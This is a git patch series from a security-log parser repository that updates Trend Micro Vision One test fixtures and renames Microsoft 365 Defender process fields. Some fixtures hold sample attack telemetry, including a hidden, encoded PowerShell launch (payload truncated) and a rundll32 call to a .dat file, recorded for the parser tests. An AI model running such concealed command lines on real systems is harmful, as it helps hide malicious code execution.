\"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", "event": { "category": [ "intrusion_detection" @@ -33,10 +33,6 @@ "product": "Vision One", "vendor": "TrendMicro" }, - "organization": { - "id": "john\\doe", - "name": "john\\doe" - }, "process": { "command_line": "C:\\WINDOWS\\Explorer.EXE", "executable": "C:\\Windows\\explorer.exe", @@ -68,6 +64,8 @@ } }, "user": { + "domain": "doe", + "id": "john\\doe", "name": "doe" } } diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json index d6ef4acd1..560c2ce13 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_process.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json @@ -33,10 +33,6 @@ "product": "Vision One", "vendor": "TrendMicro" }, - "organization": { - "id": "shockwave\\sam", - "name": "shockwave\\sam" - }, "process": { "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=", "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", @@ -50,6 +46,9 @@ ], "ip": [ "10.10.58.51" + ], + "user": [ + "shockwave" ] }, "rule": { @@ -62,6 +61,11 @@ "severity": "high", "status": "Open" } + }, + "user": { + "domain": "sam", + "id": "shockwave\\sam", + "name": "shockwave" } } } \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index 3c32834ae..9159ec844 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -29,10 +29,6 @@ "product": "Vision One", "vendor": "TrendMicro" }, - "organization": { - "id": "shockwave\\sam", - "name": "shockwave\\sam" - }, "process": { "command_line": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint", "parent": { @@ -52,6 +48,9 @@ "related": { "ip": [ "10.10.58.51" + ], + "user": [ + "shockwave" ] }, "rule": { @@ -68,7 +67,10 @@ } }, "user": { - "email": "support@pctutordetroit.com" + "domain": "sam", + "email": "support@pctutordetroit.com", + "id": "shockwave\\sam", + "name": "shockwave" } } } \ No newline at end of file From e93cd918eba05ba91b7e501ccd72d2f4c383c05d Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia <135212489+lvoloshyn-sekoia@users.noreply.github.com> Date: Tue, 26 Nov 2024 12:10:22 +0200 Subject: [PATCH 72/84] Update Trend Micro/trend-micro-vision-one/ingest/parser.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- Trend Micro/trend-micro-vision-one/ingest/parser.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index 3446a59f6..09ca7f331 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -41,8 +41,8 @@ stages: user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" - set: - user.name: "{{final.user.id.split('\\\\')[0]}}" - user.domain: "{{final.user.id.split('\\\\')[1]}}" + user.name: "{{final.user.id.split('\\\\') | last}}" + user.domain: "{{final.user.id.split('\\\\') | first}}" filter: "{{final.user.id != null}}" - set: From 454ad36347fe76d2363d7652a1d1a89125f5f15c Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 26 Nov 2024 12:11:14 +0200 Subject: [PATCH 73/84] Fix tests --- .../tests/test_internal_network_scanner.json | 2 +- Trend Micro/trend-micro-vision-one/tests/test_process.json | 6 +++--- Trend Micro/trend-micro-vision-one/tests/test_registry.json | 6 +++--- 3 files changed, 7 insertions(+), 7 deletions(-) diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json index 769477b65..b31951fe2 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json @@ -64,7 +64,7 @@ } }, "user": { - "domain": "doe", + "domain": "john", "id": "john\\doe", "name": "doe" } diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json index 560c2ce13..9c013b1c0 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_process.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json @@ -48,7 +48,7 @@ "10.10.58.51" ], "user": [ - "shockwave" + "sam" ] }, "rule": { @@ -63,9 +63,9 @@ } }, "user": { - "domain": "sam", + "domain": "shockwave", "id": "shockwave\\sam", - "name": "shockwave" + "name": "sam" } } } \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index 9159ec844..83d7e99b5 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -50,7 +50,7 @@ "10.10.58.51" ], "user": [ - "shockwave" + "sam" ] }, "rule": { @@ -67,10 +67,10 @@ } }, "user": { - "domain": "sam", + "domain": "shockwave", "email": "support@pctutordetroit.com", "id": "shockwave\\sam", - "name": "shockwave" + "name": "sam" } } } \ No newline at end of file From 0c2434b976a689fa0b51c9337ae42ac599183414 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Wed, 27 Nov 2024 16:45:52 +0100 Subject: [PATCH 74/84] Changes on custom fields --- .../microsoft-365-defender/_meta/fields.yml | 254 ++++++++---------- .../microsoft-365-defender/ingest/parser.yml | 74 +++-- .../tests/test_device_event.json | 22 +- ...test_device_event_sensitive_file_read.json | 22 +- .../tests/test_device_events_2.json | 4 +- ...test_device_events_get_clipboard_data.json | 22 +- ...test_device_events_powershell_command.json | 22 +- ..._device_events_shell_link_create_file.json | 22 +- .../tests/test_device_file_event.json | 24 +- .../tests/test_device_file_event_02.json | 24 +- .../tests/test_device_image_load_event.json | 10 +- .../tests/test_device_logon_events.json | 6 +- .../tests/test_device_network_events.json | 26 +- .../tests/test_device_process_events.json | 42 ++- .../tests/test_device_process_events_2.json | 42 ++- .../tests/test_device_registry_events.json | 24 +- .../test_devices_events_script_content.json | 4 +- .../tests/test_email_events.json | 22 +- .../tests/test_email_url_info.json | 22 +- .../tests/test_identity_directory.json | 22 +- .../tests/test_identity_info.json | 22 +- .../tests/test_identity_logon.json | 22 +- .../tests/test_identity_query.json | 22 +- .../tests/test_local_ip.json | 22 +- .../tests/test_process_error.json | 12 +- 25 files changed, 364 insertions(+), 446 deletions(-) diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml index 0e6154ccd..c92ffb8db 100644 --- a/Microsoft/microsoft-365-defender/_meta/fields.yml +++ b/Microsoft/microsoft-365-defender/_meta/fields.yml @@ -133,6 +133,78 @@ action.properties.ISP: name: action.properties.ISP type: keyword +action.properties.InitiatingProcessAccountObjectId: + description: Azure AD object ID of the user account that ran the process responsible + for the event + name: action.properties.InitiatingProcessAccountObjectId + type: keyword + +action.properties.InitiatingProcessCommandLine: + description: Process commande Line that initiated the event + name: action.properties.InitiatingProcessCommandLine + type: keyword + +action.properties.InitiatingProcessFileSize: + description: Size of the process (image file) that initiated the event + name: action.properties.InitiatingProcessFileSize + type: long + +action.properties.InitiatingProcessIntegrityLevel: + description: Integrity level of the process that initiated the event. Windows assigns + integrity levels to processes based on certain characteristics, such as if they + were launched from an internet download. These integrity levels influence permissions + to resources + name: action.properties.InitiatingProcessIntegrityLevel + type: keyword + +action.properties.InitiatingProcessLogonId: + description: Identifier for a logon session of the process that initiated the event. + This identifier is unique on the same machine only between restarts. + name: action.properties.InitiatingProcessLogonId + type: keyword + +action.properties.InitiatingProcessTokenElevation: + description: Token type indicating the presence or absence of User Access Control + (UAC) privilege elevation applied to the process that initiated the event + name: action.properties.InitiatingProcessTokenElevation + type: keyword + +action.properties.InitiatingProcessVersionInfoCompanyName: + description: Company name from the version information of the process (image file) + responsible for the event + name: action.properties.InitiatingProcessVersionInfoCompanyName + type: keyword + +action.properties.InitiatingProcessVersionInfoFileDescription: + description: Description from the version information of the process (image file) + responsible for the event + name: action.properties.InitiatingProcessVersionInfoFileDescription + type: keyword + +action.properties.InitiatingProcessVersionInfoInternalFileName: + description: Internal file name from the version information of the process (image + file) responsible for the event + name: action.properties.InitiatingProcessVersionInfoInternalFileName + type: keyword + +action.properties.InitiatingProcessVersionInfoOriginalFileName: + description: Original file name from the version information of the process (image + file) responsible for the event + name: action.properties.InitiatingProcessVersionInfoOriginalFileName + type: keyword + +action.properties.InitiatingProcessVersionInfoProductName: + description: Product name from the version information of the process (image file) + responsible for the event + name: action.properties.InitiatingProcessVersionInfoProductName + type: keyword + +action.properties.InitiatingProcessVersionInfoProductVersion: + description: Product version from the version information of the process (image + file) responsible for the event + name: action.properties.InitiatingProcessVersionInfoProductVersion + type: keyword + action.properties.IsAdminOperation: description: Indicates whether the activity was performed by an administrator name: action.properties.IsAdminOperation @@ -281,6 +353,51 @@ action.properties.PreviousRegistryValueName: name: action.properties.PreviousRegistryValueName type: keyword +action.properties.ProcessIntegrityLevel: + description: Integrity level of the newly created process. Windows assigns integrity + levels to processes based on certain characteristics, such as if they were launched + from an internet downloaded. These integrity levels influence permissions to resources + name: action.properties.ProcessIntegrityLevel + type: keyword + +action.properties.ProcessTokenElevation: + description: Token type indicating the presence or absence of User Access Control + (UAC) privilege elevation applied to the newly created process + name: action.properties.ProcessTokenElevation + type: keyword + +action.properties.ProcessVersionInfoCompanyName: + description: Company name from the version information of the newly created process + name: action.properties.ProcessVersionInfoCompanyName + type: keyword + +action.properties.ProcessVersionInfoFileDescription: + description: Description from the version information of the newly created process + name: action.properties.ProcessVersionInfoFileDescription + type: keyword + +action.properties.ProcessVersionInfoInternalFileName: + description: Internal file name from the version information of the newly created + process + name: action.properties.ProcessVersionInfoInternalFileName + type: keyword + +action.properties.ProcessVersionInfoOriginalFileName: + description: Original file name from the version information of the newly created + process + name: action.properties.ProcessVersionInfoOriginalFileName + type: keyword + +action.properties.ProcessVersionInfoProductName: + description: Product name from the version information of the newly created process + name: action.properties.ProcessVersionInfoProductName + type: keyword + +action.properties.ProcessVersionInfoProductVersion: + description: Product version from the version information of the newly created process + name: action.properties.ProcessVersionInfoProductVersion + type: keyword + action.properties.Query: description: String used to run the query name: action.properties.Query @@ -412,143 +529,6 @@ action.properties.UserLevelPolicy: name: action.properties.UserLevelPolicy type: keyword -action.properties.process.AccountObjectId: - description: Azure AD object ID of the user account that ran the process responsible - for the event - name: action.properties.process.AccountObjectId - type: keyword - -action.properties.process.CommandLine: - description: Process commande Line that initiated the event - name: action.properties.process.CommandLine - type: keyword - -action.properties.process.FileSize: - description: Size of the process (image file) that initiated the event - name: action.properties.process.FileSize - type: long - -action.properties.process.IntegrityLevel: - description: Integrity level of the newly created process. Windows assigns integrity - levels to processes based on certain characteristics, such as if they were launched - from an internet downloaded. These integrity levels influence permissions to resources - name: action.properties.process.IntegrityLevel - type: keyword - -action.properties.process.LogonId: - description: Identifier for a logon session of the process that initiated the event. - This identifier is unique on the same machine only between restarts. - name: action.properties.process.LogonId - type: keyword - -action.properties.process.TokenElevation: - description: Token type indicating the presence or absence of User Access Control - (UAC) privilege elevation applied to the newly created process - name: action.properties.process.TokenElevation - type: keyword - -action.properties.process.VersionInfoCompanyName: - description: Company name from the version information of the newly created process - name: action.properties.process.VersionInfoCompanyName - type: keyword - -action.properties.process.VersionInfoFileDescription: - description: Description from the version information of the newly created process - name: action.properties.process.VersionInfoFileDescription - type: keyword - -action.properties.process.VersionInfoInternalFileName: - description: Internal file name from the version information of the newly created - process - name: action.properties.process.VersionInfoInternalFileName - type: keyword - -action.properties.process.VersionInfoOriginalFileName: - description: Original file name from the version information of the newly created - process - name: action.properties.process.VersionInfoOriginalFileName - type: keyword - -action.properties.process.VersionInfoProductName: - description: Product name from the version information of the newly created process - name: action.properties.process.VersionInfoProductName - type: keyword - -action.properties.process.VersionInfoProductVersion: - description: Product version from the version information of the newly created process - name: action.properties.process.VersionInfoProductVersion - type: keyword - -action.properties.process.parent.AccountObjectId: - description: Azure AD object ID of the user account that ran the parent process - responsible for the event - name: action.properties.process.parent.AccountObjectId - type: keyword - -action.properties.process.parent.CommandLine: - description: Parent process commande Line that initiated the event - name: action.properties.process.parent.CommandLine - type: keyword - -action.properties.process.parent.FileSize: - description: Size of the parent process (image file) that initiated the event - name: action.properties.process.parent.FileSize - type: long - -action.properties.process.parent.IntegrityLevel: - description: Integrity level of the parent process that initiated the event. Windows - assigns integrity levels to processes based on certain characteristics, such as - if they were launched from an internet download. These integrity levels influence - permissions to resources - name: action.properties.process.parent.IntegrityLevel - type: keyword - -action.properties.process.parent.LogonId: - description: Identifier for a logon session of the parent process that initiated - the event. This identifier is unique on the same machine only between restarts. - name: action.properties.process.parent.LogonId - type: keyword - -action.properties.process.parent.TokenElevation: - description: Token type indicating the presence or absence of User Access Control - (UAC) privilege elevation applied to the parent process that initiated the event - name: action.properties.process.parent.TokenElevation - type: keyword - -action.properties.process.parent.VersionInfoCompanyName: - description: Company name from the version information of the parent process (image - file) responsible for the event - name: action.properties.process.parent.VersionInfoCompanyName - type: keyword - -action.properties.process.parent.VersionInfoFileDescription: - description: Description from the version information of the parent process (image - file) responsible for the event - name: action.properties.process.parent.VersionInfoFileDescription - type: keyword - -action.properties.process.parent.VersionInfoInternalFileName: - description: Internal file name from the version information of the parent process - (image file) responsible for the event - name: action.properties.process.parent.VersionInfoInternalFileName - type: keyword - -action.properties.process.parent.VersionInfoOriginalFileName: - description: '' - name: action.properties.process.parent.VersionInfoOriginalFileName - type: keyword - -action.properties.process.parent.VersionInfoProductName: - description: '' - name: action.properties.process.parent.VersionInfoProductName - type: keyword - -action.properties.process.parent.VersionInfoProductVersion: - description: Product version from the version information of the parent process - (image file) responsible for the event - name: action.properties.process.parent.VersionInfoProductVersion - type: keyword - email.direction: description: The direction of the message based on the sending and receiving domains name: email.direction diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index 0a33f577f..fc32171cd 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml @@ -263,18 +263,18 @@ stages: process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}" process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}" process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}" - action.properties.process.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" - action.properties.process.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" - action.properties.process.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" - action.properties.process.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" - action.properties.process.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}" - action.properties.process.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" - action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" - action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" - action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" - action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" - action.properties.process.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" - action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" + action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" + action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" + action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" + action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}" + action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" + action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" + action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" - set: process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' @@ -307,26 +307,26 @@ stages: process.name: "{{json_event.message.properties.FileName | basename}}" process.command_line: "{{json_event.message.properties.ProcessCommandLine}}" process.working_directory: "{{json_event.message.properties.FolderPath | dirname}}" - action.properties.process.TokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" - action.properties.process.IntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" - action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" - action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" - action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" - action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" - action.properties.process.VersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" - action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" - action.properties.process.parent.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" - action.properties.process.parent.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" - action.properties.process.parent.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" - action.properties.process.parent.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" - action.properties.process.parent.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" - action.properties.process.parent.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" - action.properties.process.parent.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" - action.properties.process.parent.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" - action.properties.process.parent.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" - action.properties.process.parent.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" - action.properties.process.parent.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" - action.properties.process.parent.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" + action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" + action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" + action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" + action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" + action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" + action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" + action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" + 